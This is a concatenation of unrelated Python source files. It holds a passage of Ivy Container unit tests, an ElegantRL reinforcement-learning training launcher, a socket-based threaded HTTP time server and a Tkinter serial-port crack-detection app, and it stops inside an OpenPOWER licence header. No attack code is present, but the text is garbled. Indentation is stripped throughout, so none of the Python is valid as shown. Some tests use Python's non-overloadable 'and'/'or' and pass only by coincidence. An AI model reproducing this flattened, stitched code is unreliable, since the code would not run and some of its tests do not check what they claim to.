assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_reverse_scalar_greater_than_or_equal_to(device, call):
container = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([3], device=device),
},
}
)
container = 2 >= container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_greater_than_or_equal_to(device, call):
container_a = Container(
{
"a": ivy.array([1], device=device),
"b": {
"c": ivy.array([5], device=device),
"d": ivy.array([5], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([2], device=device),
"b": {
"c": ivy.array([2], device=device),
"d": ivy.array([5], device=device),
},
}
)
container = container_a >= container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_scalar_and(device, call):
container = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = container & True
# Note: "container and True" cannot work because Python's `and`/`or` are not
# overloadable; they call bool(container) and short-circuit, so element-wise
# logic requires the `&`/`|` operators instead.
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_and(device, call):
container = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = True and container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_and(device, call):
container_a = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([False], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
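# Python's `and` cannot be overloaded; since bool(container_a) is True it simply
# returns container_b, whose values happen to match the element-wise AND here.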
container = container_a and container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_scalar_or(device, call):
container = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = container or False
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_or(device, call):
container = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = False or container
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_or(device, call):
container_a = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([False], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
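# Python's `or` returns container_a because it is truthy; its values happen to
# match the element-wise OR for these inputs.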
container = container_a or container_b
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_not(device, call):
container = ~Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_scalar_xor(device, call):
if call is helpers.mx_call:
# MXnet arrays do not overload the ^ operator, can add if explicit
# ivy.logical_xor is implemented at some point
pytest.skip()
container = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = container != True # noqa
assert np.allclose(ivy.to_numpy(container["a"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_reverse_scalar_xor(device, call):
if call is helpers.mx_call:
# MXnet arrays do not overload the ^ operator, can add if explicit
# ivy.logical_xor is implemented at some point
pytest.skip()
container = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = False != container # noqa
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_xor(device, call):
if call is helpers.mx_call:
# MXnet arrays do not overload the ^ operator, can add if explicit
# ivy.logical_xor is implemented at some point
pytest.skip()
container_a = Container(
{
"a": ivy.array([True], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container_b = Container(
{
"a": ivy.array([False], device=device),
"b": {
"c": ivy.array([True], device=device),
"d": ivy.array([False], device=device),
},
}
)
container = container_a != container_b # noqa
assert np.allclose(ivy.to_numpy(container["a"]), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container["b"]["c"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container["b"]["d"]), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_shape(device, call):
dict_in = {
"a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
"b": {
"c": ivy.array([[[2.0], [4.0], [6.0]]], device=device),
"d": ivy.array([[[3.0], [6.0], [9.0]]], device=device),
},
}
container = Container(dict_in)
assert container.shape == [1, 3, 1]
dict_in = {
"a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
"b": {
"c": ivy.array([[[2.0, 3.0], [4.0, 5.0], [6.0, 7.0]]], device=device),
"d": ivy.array([[[3.0], [6.0], [9.0]]], device=device),
},
}
container = Container(dict_in)
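# dimensions that differ across the leaves are reported as None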
assert container.shape == [1, 3, None]
dict_in = {
"a": ivy.array([[[1.0, 2.0], [2.0, 3.0], [3.0, 4.0]]], device=device),
"b": {
"c": ivy.array([[[2.0, 3.0], [4.0, 5.0], [6.0, 7.0]]], device=device),
"d": ivy.array([[[3.0, 4.0], [6.0, 7.0], [9.0, 10.0]]], device=device),
},
}
container = Container(dict_in)
assert container.shape == [1, 3, 2]
def test_container_shapes(device, call):
dict_in = {
"a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
"b": {
"c": ivy.array([[[2.0], [4.0]]], device=device),
"d": ivy.array([[9.0]], device=device),
},
}
container_shapes = Container(dict_in).shapes
assert list(container_shapes["a"]) == [1, 3, 1]
assert list(container_shapes.a) == [1, 3, 1]
assert list(container_shapes["b"]["c"]) == [1, 2, 1]
assert list(container_shapes.b.c) == [1, 2, 1]
assert list(container_shapes["b"]["d"]) == [1, 1]
assert list(container_shapes.b.d) == [1, 1]
def test_container_dev_str(device, call):
dict_in = {
"a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
"b": {
"c": ivy.array([[[2.0], [4.0], [6.0]]], device=device),
"d": ivy.array([[[3.0], [6.0], [9.0]]], device=device),
},
}
container = Container(dict_in)
assert container.dev_str == device
def test_container_create_if_absent(device, call):
dict_in = {
"a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
"b": {
"c": ivy.array([[[2.0], [4.0], [6.0]]], device=device),
"d": ivy.array([[[3.0], [6.0], [9.0]]], device=device),
},
}
# depth 1
container = Container(dict_in)
container.create_if_absent("a", None, True)
assert np.allclose(ivy.to_numpy(container.a), np.array([[[1.0], [2.0], [3.0]]]))
container.create_if_absent("e", ivy.array([[[4.0], [8.0], [12.0]]]), True)
assert np.allclose(ivy.to_numpy(container.e), np.array([[[4.0], [8.0], [12.0]]]))
# depth 2
container.create_if_absent("f/g", np.array([[[5.0], [10.0], [15.0]]]), True)
assert np.allclose(ivy.to_numpy(container.f.g), np.array([[[5.0], [10.0], [15.0]]]))
def test_container_if_exists(device, call):
dict_in = {
"a": ivy.array([[[1.0], [2.0], [3.0]]], device=device),
"b": {
"c": ivy.array([[[2.0], [4.0], [6.0]]], device=device),
"d": ivy.array([[[3.0], [6.0], [9.0]]], device=device),
},
}
container = Container(dict_in)
assert np.allclose(
ivy.to_numpy(container.if_exists("a")), np.array([[[1.0], [2.0], [3.0]]])
)
assert "c" not in container
assert container.if_exists("c") is None
container["c"] = ivy.array([[[1.0], [2.0], [3.0]]], device=device)
assert np.allclose(
ivy.to_numpy(container.if_exists("c")), np.array([[[1.0], [2.0], [3.0]]])
)
assert container.if_exists("d") is None
container.d = ivy.array([[[1.0], [2.0], [3.0]]], device=device)
assert np.allclose(
ivy.to_numpy(container.if_exists("d")), np.array([[[1.0], [2.0], [3.0]]])
)
def test_jax_pytree_compatibility(device, call):
if call is not helpers.jnp_call:
pytest.skip()
# import
from jax.tree_util import tree_flatten
# dict in
dict_in = {
"a": ivy.array([1], device=device),
"b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
}
# container
container = Container(dict_in)
# container flattened
cont_values = tree_flatten(container)[0]
# dict flattened
true_values = tree_flatten(dict_in)[0]
# assertion
for i, true_val in enumerate(true_values):
assert np.array_equal(ivy.to_numpy(cont_values[i]), ivy.to_numpy(true_val))
def test_container_from_queues(device, call):
if "gpu" in device:
# Cannot re-initialize CUDA in forked subprocess. 'spawn'
# start method must be used.
pytest.skip()
if ivy.gpu_is_available() and call is helpers.jnp_call:
# Not found a way to set default device for JAX, and this causes
# issues with multiprocessing and CUDA, even when device=cpu
# ToDo: find a fix for this problem ^^
pytest.skip()
def worker_fn(in_queue, out_queue, load_size, worker_id):
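# each message received on in_queue triggers one batch on out_queue;
# a False message ends the loop after that final batch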
keep_going = True
while keep_going:
try:
keep_going = in_queue.get(timeout=0.1)
except queue.Empty:
continue
out_queue.put(
{
"a": [
ivy.to_native(ivy.array([1.0, 2.0, 3.0], device=device))
* worker_id
]
* load_size
}
)
workers = list()
in_queues = list()
out_queues = list()
queue_load_sizes = [1, 2, 1]
for i, queue_load_size in enumerate(queue_load_sizes):
input_queue = multiprocessing.Queue()
output_queue = multiprocessing.Queue()
worker = multiprocessing.Process(
target=worker_fn, args=(input_queue, output_queue, queue_load_size, i + 1)
)
worker.start()
in_queues.append(input_queue)
out_queues.append(output_queue)
workers.append(worker)
container = Container(
queues=out_queues, queue_load_sizes=queue_load_sizes, queue_timeout=0.25
)
# queue 0
queue_was_empty = False
try:
container[0]
except queue.Empty:
queue_was_empty = True
assert queue_was_empty
in_queues[0].put(True)
assert np.allclose(ivy.to_numpy(container[0].a), np.array([1.0, 2.0, 3.0]))
assert np.allclose(ivy.to_numpy(container[0].a), np.array([1.0, 2.0, 3.0]))
# queue 1
queue_was_empty = False
try:
container[1]
except queue.Empty:
queue_was_empty = True
assert queue_was_empty
queue_was_empty = False
try:
container[2]
except queue.Empty:
queue_was_empty = True
assert queue_was_empty
in_queues[1].put(True)
assert np.allclose(ivy.to_numpy(container[1].a), np.array([2.0, 4.0, 6.0]))
assert np.allclose(ivy.to_numpy(container[1].a), np.array([2.0, 4.0, 6.0]))
assert np.allclose(ivy.to_numpy(container[2].a), np.array([2.0, 4.0, 6.0]))
assert np.allclose(ivy.to_numpy(container[2].a), np.array([2.0, 4.0, 6.0]))
# queue 2
queue_was_empty = False
try:
container[3]
except queue.Empty:
queue_was_empty = True
assert queue_was_empty
in_queues[2].put(True)
assert np.allclose(ivy.to_numpy(container[3].a), np.array([3.0, 6.0, 9.0]))
assert np.allclose(ivy.to_numpy(container[3].a), np.array([3.0, 6.0, 9.0]))
# stop workers
in_queues[0].put(False)
in_queues[1].put(False)
in_queues[2].put(False)
in_queues[0].close()
in_queues[1].close()
in_queues[2].close()
# join workers
for worker in workers:
worker.join()
del container
|
run.py
|
import os
import sys
import time
import torch
import shutil
from elegantrl.train.utils import init_agent, init_evaluator, init_replay_buffer
from elegantrl.train.utils import server_leaderboard, PipeEvaluator
from elegantrl.train.config import build_env
from elegantrl.train.worker import PipeWorker
from elegantrl.train.learner import PipeLearner
def train_and_evaluate(args):
args.init_before_training() # necessary!
learner_gpu = args.learner_gpus[0]
env = build_env(env=args.env, env_func=args.env_func, env_args=args.env_args, gpu_id=learner_gpu)
agent = init_agent(args, gpu_id=learner_gpu, env=env)
evaluator = init_evaluator(args, agent_id=0)
buffer, update_buffer = init_replay_buffer(args, learner_gpu, agent, env=env)
"""start training"""
cwd = args.cwd
break_step = args.break_step
batch_size = args.batch_size
target_step = args.target_step
repeat_times = args.repeat_times
if_allow_break = args.if_allow_break
soft_update_tau = args.soft_update_tau
del args
'''start training loop'''
if_train = True
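# autograd stays disabled for exploration and evaluation; it is only
# switched on around agent.update_net below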
torch.set_grad_enabled(False)
while if_train:
traj_list = agent.explore_env(env, target_step)
steps, r_exp = update_buffer(traj_list)
torch.set_grad_enabled(True)
logging_tuple = agent.update_net(buffer, batch_size, repeat_times, soft_update_tau)
torch.set_grad_enabled(False)
if_reach_goal, if_save = evaluator.evaluate_and_save(agent.act, steps, r_exp, logging_tuple)
if_train = not ((if_allow_break and if_reach_goal)
or evaluator.total_step > break_step
or os.path.exists(f'{cwd}/stop'))
print(f'| UsedTime: {time.time() - evaluator.start_time:>7.0f} | SavedDir: {cwd}')
agent.save_or_load_agent(cwd, if_save=True)
if agent.if_off_policy:
    buffer.save_or_load_history(cwd, if_save=True)
evaluator.save_or_load_recoder(if_save=True)
def train_and_evaluate_mp(args, python_path=''):
import multiprocessing as mp
if_from_ensemble = sys.argv[-1] == 'FromEnsemble'
agent_id = int(sys.argv[-2]) if if_from_ensemble else 0
from collections.abc import Iterable
if isinstance(args.learner_gpus, int):
args.learner_gpus = (args.learner_gpus, )
if (not isinstance(args.learner_gpus[0], Iterable)) or if_from_ensemble:
args.init_before_training(agent_id=agent_id) # necessary!
process = list()
mp.set_start_method(method='spawn', force=True) # force all the multiprocessing to 'spawn' methods
'''evaluator'''
evaluator_pipe = PipeEvaluator(save_gap=args.save_gap, save_dir=args.save_dir)
process.append(mp.Process(target=evaluator_pipe.run, args=(args, agent_id)))
learner_pipe = PipeLearner(args.learner_gpus)
for learner_id in range(len(args.learner_gpus)):
'''explorer'''
worker_pipe = PipeWorker(args.env_num, args.worker_num)
process.extend([mp.Process(target=worker_pipe.run, args=(args, worker_id, learner_id))
for worker_id in range(args.worker_num)])
'''learner'''
evaluator_temp = evaluator_pipe if learner_id == 0 else None
process.append(mp.Process(target=learner_pipe.run, args=(args, evaluator_temp, worker_pipe, learner_id)))
[(p.start(), time.sleep(0.1)) for p in process]
process[0].join()
process_safely_terminate(process)
else:
from subprocess import Popen
python_path = python_path if python_path else get_python_path()
python_proc = sys.argv[0]
ensemble_dir = args.save_dir
ensemble_num = len(args.learner_gpus)
shutil.rmtree(ensemble_dir, ignore_errors=True)
os.makedirs(ensemble_dir, exist_ok=True)
proc_leaderboard = mp.Process(target=server_leaderboard, args=(ensemble_num, ensemble_dir))
proc_leaderboard.start()
print('subprocess Start')
process = list()
for agent_id in range(ensemble_num):
command_str = f"{python_path} {python_proc} {agent_id} FromEnsemble"
command_list = command_str.split(' ')
process.append(Popen(command_list))
for proc in process:
proc.communicate()
print('subprocess Stop')
proc_leaderboard.join()
'''private utils'''
def get_python_path(): # useless
from subprocess import check_output
python_path = check_output("which python3", shell=True).strip()
python_path = python_path.decode('utf-8')
print(f"| get_python_path: {python_path}")
return python_path
def process_safely_terminate(process):
for p in process:
try:
p.kill()
except OSError as e:
print(e)
pass
def check_subprocess():
import subprocess
timer = time.time()
print('subprocess Start')
process = [subprocess.Popen(f"sleep 3".split(' ')) for _ in range(4)]
[proc.communicate() for proc in process]
print('subprocess Stop:', time.time() - timer)
|
http_server__threading.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# SOURCE: http://andreymal.org/socket3/
import time
import socket
from threading import Thread
def send_answer(conn, status="200 OK", typ="text/plain; charset=utf-8", data=""):
data = data.encode("utf-8")
conn.send(b"HTTP/1.1 " + status.encode("utf-8") + b"\r\n")
conn.send(b"Server: simplehttp\r\n")
conn.send(b"Connection: close\r\n")
conn.send(b"Content-Type: " + typ.encode("utf-8") + b"\r\n")
conn.send(b"Content-Length: " + str(len(data)).encode() + b"\r\n")
conn.send(b"\r\n")  # in HTTP, the body starts after an empty line
conn.send(data)
def parse(conn):  # handle the connection in a separate function
try:
data = b""
while b"\r\n" not in data:  # wait for the first line
tmp = conn.recv(1024)
# the socket was closed, empty object received
if not tmp:
break
else:
data += tmp
# no data arrived
if not data:
return
udata = data.decode("utf-8")
# take only the first line
udata = udata.split("\r\n", 1)[0]
# split the line on spaces
method, address, protocol = udata.split(" ", 2)
# if method != "GET" or address != "/time.html":
# send_answer(conn, "404 Not Found", data="Not found")
# return
answer = """<!DOCTYPE html>"""
answer += """<html><head><title>Time</title></head><body><h1>"""
answer += time.strftime("%H:%M:%S %d.%m.%Y")
answer += """</h1></body></html>"""
send_answer(conn, typ="text/html; charset=utf-8", data=answer)
except Exception:
send_answer(conn, "500 Internal Server Error", data="Error")
finally:
conn.close()
HOST = 'localhost'
PORT = 9090
if __name__ == '__main__':
sock = socket.socket()
print('Socket created')
sock.bind((HOST, PORT))
print('Socket bind complete')
sock.listen()
print('Socket now listening: http://{}:{}'.format(*sock.getsockname()))
print()
try:
# run forever
while True:
conn, addr = sock.accept()
print("New connection from " + addr[0])
thread = Thread(target=parse, args=[conn])
thread.start()
finally:
sock.close()
|
app.py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 12 01:39:31 2021
@author: amannirala13
"""
# Library import block
import serial
import numpy as np
import os
try:
import tkinter as tk
except:
import Tkinter as tk
import time
import threading
from datetime import datetime, timedelta
#-------------------------------------------
class App(tk.Frame):
def __init__(self,root, *args, **kwargs):
tk.Frame.__init__(self,root, *args, **kwargs)
self.root = root
self.mainCalibration = self.Calibrate()
self.IS_DETECTION_ON = False
self.depthSensitivity = 0.0
self.SMS_ONGOING = False
self.smsEndTime = datetime.now()
tk.Label(self.root, text="COM Port: ").grid(row=0, pady = 10)
tk.Label(self.root, text="Baud Rate: ").grid(row=0, column=2, pady = 10)
tk.Label(self.root, text="Depth Sensitivity(cm): ").grid(row=1, pady = 10)
tk.Label(self.root, text="Max Distance Allowed(cm): ").grid(row=2, pady = 10)
tk.Label(self.root, text="Calibration Time(s): ").grid(row=4, pady = 10)
self.comPortTextField = tk.Entry(self.root, bg='#CFD8DC')
self.baudrateTextField = tk.Entry(self.root, bg='#CFD8DC')
self.depthTextField = tk.Entry(self.root, bg='#CFD8DC')
self.maxDistanceField = tk.Entry(self.root, bg='#CFD8DC')
self.calibrationTimeTextField = tk.Entry(self.root, bg='#CFD8DC')
self.calibrateBtn = tk.Button(self.root, text="Calibrate",width = 25, bg='#FFEE58', height=2)
self.startBtn = tk.Button(self.root, text="Start detection", width = 25, bg='#66BB6A', height=2)
self.showGraphBtn = tk.Button(self.root, text="Show Graph", width = 25, bg='#29B6F6', height=2)
self.saveComConfigBtn = tk.Button(self.root, text="Save COM Config", width = 25,bg='#9575CD' ,height = 2)
self.comPortTextField.grid(row=0,column=1, pady = 10)
self.baudrateTextField.grid(row=0, column=3, pady = 10, padx=10)
self.depthTextField.grid(row=1, column=1, pady = 10)
self.maxDistanceField.grid(row=2, column=1, pady = 10)
self.calibrationTimeTextField.grid(row=4, column=1, pady = 10)
self.calibrateBtn.grid(row=5)
self.startBtn.grid(row=5, column=1)
self.showGraphBtn.grid(row = 5, column=2, columnspan=2,ipadx=10)
self.saveComConfigBtn.grid(row=3, column=2, columnspan=2, rowspan=2,ipadx=10)
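# restore previously saved serial settings from com.config ('<port>:<baudrate>');
# fall back to an unopened default port at 9600 baud if the file is missing or malformed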
try:
comConfigFile = open('com.config', 'r')
config = comConfigFile.read().split(':')
if(len(config) == 2):
self.com = config[0]
self.baudrate = int(config[1])
self.comPortTextField.insert(0,self.com)
self.serialPort = serial.Serial(port = self.com, baudrate=self.baudrate)
self.baudrateTextField.insert(0,self.baudrate)
else:
self.com = None
self.baudrate = 9600
self.baudrateTextField.insert(0,self.baudrate)
self.serialPort = serial.Serial()
comConfigFile.close()
except IOError as e:
print(e)
self.com = None
self.baudrate = 9600
self.baudrateTextField.insert(0,self.baudrate)
self.serialPort = serial.Serial()
self.calibrateBtn.config(command=lambda:threading.Thread(target=self.startCalibration, daemon=True).start())
self.startBtn.config(command=lambda:threading.Thread(target=self.startDetection, daemon=True).start())
#self.startBtn.config(command= self.startDetection)
self.showGraphBtn.config(command=lambda:threading.Thread(target= lambda: os.system('python graph.py log.data '+str(self.mainCalibration.surface_threshold), ),daemon=True).start())
self.saveComConfigBtn.config(command=lambda:threading.Thread(target=self.saveCOMConfig).start())
class Calibrate():
def __init__(self):
self.surface_normal = 0.0
self.max_error = 0.0
self.min_error = 0.0
self.mean_error = 0.0
self.max_distance = 0.0
self.surface_max_distance = 0.0
self.surface_min_distance = 0.0
self.surface_threshold = 0.0
self.is_calibrated = False
def startSerialPortCom(self):
print("STATUS: Starting communication with serial port...")
self.baudrate = int(self.baudrateTextField.get())
if self.serialPort.port is None:
self.com = self.comPortTextField.get()
self.serialPort = serial.Serial(port=self.com, baudrate=self.baudrate)
else:
self.serialPort.open()
def stopSerialPortCom(self):
print("STATUS: Stopping communication with serial port...")
try:
self.serialPort.close()
except Exception as e:
print("ERROR: Unable to close serial port | ",e)
def saveCOMConfig(self):
try:
comConfigFile = open('com.config','w')
com = self.comPortTextField.get()
baudRate = self.baudrateTextField.get()
if com == '' or baudRate == '':
print("ERROR: Please enter valid com and baudrate values")
comConfigFile.close()
return
comConfigFile.write(com + ':' + baudRate)
comConfigFile.close()
except Exception as e:
print("ERROR: Unable to open com.config file | ",e)
def startCalibration(self):
try:
if not self.serialPort.isOpen():
self.startSerialPortCom()
except Exception as e:
print("ERROR: Unable to open serial port | ", e)
return
#TODO: Put this whole block in try and catch and make changes in status text
self.calibrateBtn.config(text= "Calibrating...")
self.calibrateBtn.config(state = 'disabled')
self.startBtn.config(state = 'disabled')
try:
self.mainCalibration.max_distance = float(self.maxDistanceField.get())
calibrationTime = float(self.calibrationTimeTextField.get())
except Exception as e:
print("Please enter valid number arguments | ", e)
return
endTime = datetime.now() + timedelta(seconds=calibrationTime)
distanceList = []
print("STATUS: Reading input....please wait...")
self.serialPort.reset_input_buffer()
while(datetime.now()<endTime):
serialString = ''
try:
if(self.serialPort.in_waiting > 0):
serialString = self.serialPort.readline().strip()
distance = float(serialString.decode('Ascii'))
distanceList.append(distance)
except Exception as e:
print("WARNING: Skipped corrupted bytes! | ",e)
data = np.array(distanceList)
self.mainCalibration.surface_normal = np.mean(data)
self.mainCalibration.surface_min_distance = np.min(data)
self.mainCalibration.surface_max_distance = np.max(data)
self.mainCalibration.max_error = self.mainCalibration.surface_max_distance - self.mainCalibration.surface_normal
self.mainCalibration.min_error = self.mainCalibration.surface_min_distance - self.mainCalibration.surface_normal
self.mainCalibration.mean_error = np.mean(data - self.mainCalibration.surface_normal)
self.mainCalibration.is_calibrated = True
print("Normal surface reading = ", self.mainCalibration.surface_normal)
print("Minimum surface reading: ", self.mainCalibration.surface_min_distance)
print("Maximum surface reading = ", self.mainCalibration.surface_max_distance)
print("Maximum error = ", self.mainCalibration.max_error)
print("Minimum error = ", self.mainCalibration.min_error)
print("Mean error = ", self.mainCalibration.mean_error)
if self.mainCalibration.max_distance < self.mainCalibration.surface_max_distance:
self.mainCalibration.is_calibrated = False
print("ERROR: Calibration failed due to noisy readings. Please calibrate again before using the application.")
self.calibrateBtn.config(text = "Calibrate Now!")
self.calibrateBtn.config(state = 'normal')
self.startBtn.config(state = 'normal')
else:
self.calibrateBtn.config(text = "Calibrate")
self.calibrateBtn.config(state = 'normal')
self.startBtn.config(state = 'normal')
self.mainCalibration.is_calibrated = True
if self.serialPort.isOpen():
self.stopSerialPortCom()
def startDetection(self):
self.depthSensitivity = float(self.depthTextField.get())
if self.IS_DETECTION_ON:
self.IS_DETECTION_ON = False
self.startBtn.config(bg='#66BB6A', text='Start Detection')
else:
if not self.mainCalibration.is_calibrated:
if self.serialPort.isOpen():
self.stopSerialPortCom()
threading.Thread(target=self.startCalibration, daemon=True).start()
self.mainCalibration.surface_threshold = self.mainCalibration.surface_normal + self.mainCalibration.mean_error + self.depthSensitivity
print("Surface threshold", self.mainCalibration.surface_threshold)
print("Detecting surface...")
try:
if not self.serialPort.isOpen():
self.startSerialPortCom()
except Exception as e:
print("ERROR: Unable to open serial port | ",e)
return
self.IS_DETECTION_ON = True
self.startBtn.config(bg='#e57373', text='Stop Detection')
try:
dataLogFile = open('log.data', 'w')
dataLogFile.write('0,')
dataLogFile.close()
except Exception as e:
print("ERROR: Unable to create data log file. Graph features will not work properly | ",e)
while(self.IS_DETECTION_ON):
try:
if(self.serialPort.in_waiting > 0):
try:
dataLogFile = open('log.data', 'a')
except Exception as e:
print("ERROR: Unable to create data log file. Graph features will not work | ",e)
serialString = self.serialPort.readline()
distance = float(serialString.decode('Ascii').strip())
if distance<self.mainCalibration.max_distance:
dataLogFile.write(str(distance)+",")
if(distance > self.mainCalibration.surface_threshold):
print("Crack Detected: ", distance)
threading.Thread(target=self.sendSMS, args=(distance,)).start()
dataLogFile.close()
except Exception:
print("WARNING: Skipped corrupted bytes!")
self.IS_DETECTION_ON = False
if self.serialPort.isOpen():
self.stopSerialPortCom()
def sendSMS(self, distance):
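# throttle alerts: while an SMS window (30 s) is active further detections are
# ignored; once it expires the flag resets and the message is sent again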
if not self.SMS_ONGOING:
self.SMS_ONGOING = True
print("INFO: Sending SMS")
self.smsEndTime = datetime.now()+timedelta(seconds=30)
os.system('python sms.py '+str(distance))
elif datetime.now()>self.smsEndTime:
self.SMS_ONGOING = False
self.sendSMS(distance)
else:
return
if __name__ == '__main__':
window = tk.Tk()
try:
window.iconbitmap('ic.ico')
except:
print("WARNING: ic.ico file missing or not supported")
window.title("Crack Detection(1.1)- amannirala13")
App(root = window)
window.mainloop()
|
OpTestInstallUtil.py
|
#!/usr/bin/env python2
# OpenPOWER Automated Test Project
#
# Contributors Listed Below - COPYRIGHT 2018
# [+] International Business Machines Corp.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
